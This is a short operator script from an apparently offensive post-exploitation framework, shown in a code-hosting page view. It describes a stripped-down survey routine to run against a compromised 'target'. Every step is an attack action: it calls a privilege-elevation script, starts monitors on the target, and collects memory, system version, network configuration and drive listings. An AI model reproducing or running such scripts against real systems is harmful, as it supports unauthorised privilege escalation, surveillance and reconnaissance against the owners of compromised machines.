43 lines
1.4 KiB
PostScript
43 lines
1.4 KiB
PostScript
#-------------------------------------------------------------------------------
|
|
# File: realy_simple.eps
|
|
# Description: A very stripped down version of simple, good for
|
|
# ops where Oly is thrown down. Also good to run
|
|
# after you have lost a connection to a target that you've
|
|
# already run the full simple against.
|
|
# 17 Mar 2004 Created....
|
|
# 28 Feb 2008 Modified....
|
|
#-------------------------------------------------------------------------------
|
|
|
|
|
|
#####################################################
|
|
# Elevation Section
|
|
#####################################################
|
|
`script getPrivs.eps`;
|
|
pause;
|
|
|
|
#####################################################
|
|
# Get Memory Usage
|
|
#####################################################
|
|
`memory`;
|
|
|
|
#####################################################
|
|
# Monitors Section
|
|
#####################################################
|
|
`script startmonitors.eps`;
|
|
|
|
####################################################
|
|
# System version
|
|
####################################################
|
|
`systemversion`;
|
|
|
|
####################################################
|
|
# IPconfig
|
|
####################################################
|
|
`ipconfig`;
|
|
|
|
####################################################
|
|
# Listdrives
|
|
####################################################
|
|
`listdrives`;
|
|
|
|
|